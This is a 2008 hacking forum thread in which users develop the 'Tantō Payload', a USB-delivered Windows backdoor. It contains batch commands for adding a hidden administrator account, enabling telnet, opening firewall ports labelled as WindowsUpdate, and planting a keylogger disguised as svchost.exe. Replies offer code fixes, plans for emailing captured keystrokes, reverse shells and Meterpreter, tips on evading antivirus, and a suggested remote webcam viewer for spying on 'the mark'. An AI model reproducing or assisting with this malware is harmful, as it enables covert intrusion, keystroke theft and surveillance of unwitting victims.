DingleBerries Posted November 21, 2008 Share Posted November 21, 2008 The Tantō Payload Tantō: The tantō was designed primarily as a stabbing weapon, but the edge can be used for slashing as well. LINK I want to keep this as light and fast as possible, no Nirsoft or Oxidt software. The goal of this payload is not to steal documents, infect the computer with an emailing keylogger, or install a vnc client, but to be able to use the machine remotely via command line interface. Once we own the computer with this payload we should be able to sit and wait, like a Samiri, for the mark to leave(that is when the "exploitation" should begin). COMPLETED: KeyLogger Remote Shell Refresh Group Policies Start telnet server on bootup Add user, "Tanto" to localgroup Dump Users to %computername%_Users.txt Hide Tanto with registry entry, without touching hard disk Dump IP of all currently attached NICS to %computername%_IP.txt Punch hole in Windows Firewall, opening port 23 and 81, labeling it WindowsUpdate and System TO DO: Activate WOL Windows Recovery Partition poisioning - As soon as I get some directory dumps from the community I can start on this Assigns Drive letter "T" to thumbdrive Program to send IP to email periodically Use Russell Butturini's method of locating the USB drive and writing to it Releases Tantō Payload v. 1 Release: Friday November 28, 2008 NOTE THIS IS NOT A U3 PAYLOAD Run "1.vbs" Adds user Tanto Opens telnet Opens port 81 for back door Auto start keylogger and backdoor Tantō Payload RC v.0.1 Release: Friday November 21, 2008 I already have most of this planned out. I will release the source, if you dont decompile the .exe first, when Version 1 is out. Right now the .txt files are written to the same directory as the .exe, once it comes closer to time I will make the .ISO. I want to be sure I am doing it differently than the ones that have came before, as to not set off any alarms. TantōPayload RC v.0.2 Release: Friday November 21, 2008 Same as RC v.0.1 also: Copies keyloger to %windir% and sets hidden attribute Adds registry entries for auto start The payload.bat needs to have PAUSE commented out and changed back to END /ect ect so that processes are closed The antidote is working a little better, still needs work TantōAntidote RC v.0.1 Release: Friday November 21, 2008 Disable Telnet server Reset FireWall to Defaults Removes traces of Tanto user account Refreshes local and Active Directory based Group Policy settings DOWNLOADS: Tantō Payload RC v.0.1 Tantō Antidote RC v.0.1 Tantō Payload RC v.0.2 Tantō Payload v. 1 Quote Link to comment Share on other sites More sharing options...
psydT0ne Posted November 21, 2008 Share Posted November 21, 2008 Sounds sweet man, i'm looking forward to trying it out. love the name...very cool. Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted November 21, 2008 Author Share Posted November 21, 2008 In the completed area, the task are not ran in that order. I just liked having them go smallest to largest for aesthetic purposes. I think I will go to bed now and probably wake up around 12, do some school shit, and maybe go to the gym.. then ill get back on this lol.. I am also contemplating a remote webcam viewer, but Im not sure how ethical that would be. Remember SUGGESTION ARE ENCOURAGED! Quote Link to comment Share on other sites More sharing options...
DMilton Posted November 21, 2008 Share Posted November 21, 2008 If you want, whe can code an aspirine for you, man! You did it fast and easy, good job, I feel the idea is very good! I'll be testing it during next days. The name of the tool is cool. Sleep a bit by now! :edit By the way, I don't know if the antidote is working, because it doesn't delete the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Tanto user. It doesn't generate the .txt files, only if I exec it from system drive root. When exec it, it leaves three exe files running in Task Manager: beta2.exe, cmd.exe and reg.exe. Antidote doesn't terminate those tasks at all and leaves another reg.exe instance running in background. I think it can be caused because any problem with path names? If you want, PM the source, I'll try a look at it. Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted November 22, 2008 Author Share Posted November 22, 2008 RC2 now has the bat scrips, it still really needs work, however the keylogger is inside. DOWNLOAD Quote Link to comment Share on other sites More sharing options...
Matessim Posted November 22, 2008 Share Posted November 22, 2008 hopefully this will develop. is it U3? how is it configured?. what output, html? can you implant the feature which immidietly sends a email with the logs? to secure a home run ? :P Quote Link to comment Share on other sites More sharing options...
DMilton Posted November 22, 2008 Share Posted November 22, 2008 Some issues and fixing them... net user Tanto password /add && net localgroup administrators Tanto /add In the adding of Tanto administrator account, the payload only will create it if the Group name of administrators is "administrators" (it's not my case). It will cause an error and will not work for systems wich Administrators Groups have been changed to another name or is installed in other language system. A solution will be getting the correct administrators group name for a secure creating of the Tanto user. This way was the one I was developing in this post. The idea is getting the name of Administrators Group by asking for the S-1-5-32-544 SID and passing it to the payload in a variable. ::Hide Tanto's folder from prying eyes attrib +r +a +s +h %SystemDrive%\docume~1\Tanto Before you attrib anything, you must creating the folder and in the batch code isn't. The correct code would be: ::Create and hide Tanto's folder from prying eyes mkdir %SystemDrive%\docume~1\Tanto attrib +r +a +s +h %SystemDrive%\docume~1\Tanto ::Change file attributes to Read-only, Hidden, Archive, and System attributes to the file ATTRIB +H %windir%\svchost.exe In the attribution of Read-only, Hidden, Archive and System to the keylogger you ommited the +r +a +s Correct line would be: ::Change file attributes to Read-only, Hidden, Archive, and System attributes to the file ATTRIB +r +a +s +hH %windir%\svchost.exe ::Delete Keylogger ( cd %windir% del svchost.exe ) In deletion task of the svchost.exe file, this code will fail because the payload is running from the usb and not de %Systemdrive%. The correct code would be: ::Delete Keylogger del %windir%\svchost.exe SUGGESTIONS I prefer to add the name of the account an the password by putting it in a variable at the beggining of the batch or in an .ini file if it's exe-compiled and can't be eddited, so we can add the user we want and not only Tanto user. Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted November 22, 2008 Author Share Posted November 22, 2008 In the attribution of Read-only, Hidden, Archive and System to the keylogger you ommited the +r +a +s Correct line would be: I had a problem with that part, when i chaged that attrib to +sar the key loggers log file wont show up either. I gues we can create that first and just give it a hidden attrib. Also looking at THIS for emailing logs if that is implemented along the way. On the subject of remote shells I was also looking into adding openssh as well because its less likely to get picked up by AV. Quote Link to comment Share on other sites More sharing options...
X3N Posted November 23, 2008 Share Posted November 23, 2008 I had a problem with that part, when i chaged that attrib to +sar the key loggers log file wont show up either. I gues we can create that first and just give it a hidden attrib. Also looking at THIS for emailing logs if that is implemented along the way. On the subject of remote shells I was also looking into adding openssh as well because its less likely to get picked up by AV. i have some autoIT code that will send mail which is even compatible with gmail. i have some python code i been working on to send log files via google talk too... and i been workin on tryin to make a custom reverse shell in python using xml-rpc Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted November 23, 2008 Author Share Posted November 23, 2008 i have some autoIT code that will send mail which is even compatible with gmail. i have some python code i been working on to send log files via google talk too... and i been working on trying to make a custom reverse shell in python using xml-rpc I have to admit i know very little about python, i can read it and modify some of it, but i am in no way fluent. However it is my assumption that you would have to have the frame work installed in order to run the script. Also sending the log file is some what of a good idea but now it is adding more. I guess its a good idea because the marks IP would be in the header, revealing the need to have another program call home. Also i was looking at scheduling a delete of the log file once it was sent, or should that be done by the attacker? Quote Link to comment Share on other sites More sharing options...
Tcstool Posted November 23, 2008 Share Posted November 23, 2008 http://www.irongeek.com/i.php?page=videos/...with-metasploit Check that stuff out, it might be helpful in this project. Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted November 23, 2008 Author Share Posted November 23, 2008 http://www.irongeek.com/i.php?page=videos/...with-metasploit Check that stuff out, it might be helpful in this project. Thats the only problem I see with a pay load. I can do most of what i want with Metasploit. I think opening ports in the firewall, enabling telnet and installing wget is more then enough, then all I have to do is get on an unsecured wireless network and host a fileserver to download the keylogger and edit reg settings from cmd. I have used the hasksaw in the past and thought i would be nice to try and add something since i have taken something Quote Link to comment Share on other sites More sharing options...
Jen Posted November 23, 2008 Share Posted November 23, 2008 So how do you work this? Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted November 23, 2008 Author Share Posted November 23, 2008 So how do you work this? Its beta, like the earliest of all betas, I just wanted some community input before anything was final so there is no "working this" atm. The key logger will work on its own and the rest is all cmd shit. Quote Link to comment Share on other sites More sharing options...
Jen Posted November 24, 2008 Share Posted November 24, 2008 i mean right now do we just run the cmd? Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted November 24, 2008 Author Share Posted November 24, 2008 i mean right now do we just run the cmd? yeah but its not u3 ready, if you add it to the iso all it will do is open firewall ports and turn on tell net. There is some heavy coding steal needed. After this semester i should have a break to work on it. Also ubuntu is starting to support autorun.inf so if the ufs partition starts getting recognized that may be good news. Quote Link to comment Share on other sites More sharing options...
X3N Posted November 24, 2008 Share Posted November 24, 2008 I have to admit i know very little about python, i can read it and modify some of it, but i am in no way fluent. However it is my assumption that you would have to have the frame work installed in order to run the script. Also sending the log file is some what of a good idea but now it is adding more. I guess its a good idea because the marks IP would be in the header, revealing the need to have another program call home. Also i was looking at scheduling a delete of the log file once it was sent, or should that be done by the attacker? the python script can be compiled into an exe after its developed also the autoIT is compilable into an exe. also depending on how you wrote the code the log could be stored as a variable or hidden temp file to be sent out after it completes in order to avoid needing to cleanup afterwords... Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted November 24, 2008 Author Share Posted November 24, 2008 the python script can be compiled into an exe after its developed also the autoIT is compilable into an exe. also depending on how you wrote the code the log could be stored as a variable or hidden temp file to be sent out after it completes in order to avoid needing to cleanup afterwords... I didnt know that about python, Ive seen sooo many tools that can steal creds and what not. Hmm, if that is true i may be switching to that. Thank you Quote Link to comment Share on other sites More sharing options...
X3N Posted November 24, 2008 Share Posted November 24, 2008 I didnt know that about python, Ive seen sooo many tools that can steal creds and what not. Hmm, if that is true i may be switching to that. Thank you yeah thers a script called py2exe that does it .... i havnt successfully done it yet because i havnt gotten that far with the development... but that shouldnt be too far off Quote Link to comment Share on other sites More sharing options...
Tcstool Posted November 24, 2008 Share Posted November 24, 2008 Thats the only problem I see with a pay load. I can do most of what i want with Metasploit. I think opening ports in the firewall, enabling telnet and installing wget is more then enough, then all I have to do is get on an unsecured wireless network and host a fileserver to download the keylogger and edit reg settings from cmd. I have used the hasksaw in the past and thought i would be nice to try and add something since i have taken something I just think it would be awesome to have your reverse shell you're throwing back be Meterpreter! Plus being able to do the encoding to trick the AV isn't bad either. Quote Link to comment Share on other sites More sharing options...
pritchard9 Posted November 25, 2008 Share Posted November 25, 2008 Sweet project DingleBerries! Nice name too :P Ill be keeping an eye on this, fo' sho'! Pritchardo92 Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted November 28, 2008 Author Share Posted November 28, 2008 Tanto Payload v. 1 HERE Note this is not a U3 payload, that part still needs work. I think this works, but it still needs beta testers. I only tried it in a VM(only windows machine I have). The .exe is linked to the VBS so do not change the name unless you change it in the vbs as well. The source is included as well as the Back door and keylogger. There are dumped log files and what not. I will do a virii scan here in a minute. System.exe is picked up as a virus by pretty much every virus protection, except: Avast CAT-QuickHeal eSafe eTrust-Vet Fortinet PCTools Prevx1 Sophos Symantec TheHacker TrendMicro ViRobot VirusBuster I will try to pack that later. The payload is flagged by eSafe and Panda. Ikarus says its adware, and F-Secure says "Tibs.DBVL". The keylogger isnt picked up. Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted November 30, 2008 Author Share Posted November 30, 2008 Feedback anyone? Is it working? Quote Link to comment Share on other sites More sharing options...
alexthedrifter Posted November 30, 2008 Share Posted November 30, 2008 How does the keylogger work? Quote Link to comment Share on other sites More sharing options...
PLuNK Posted November 30, 2008 Share Posted November 30, 2008 Take a look at the source of It all, Your not going to learn much from the marketing words of Dingle. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.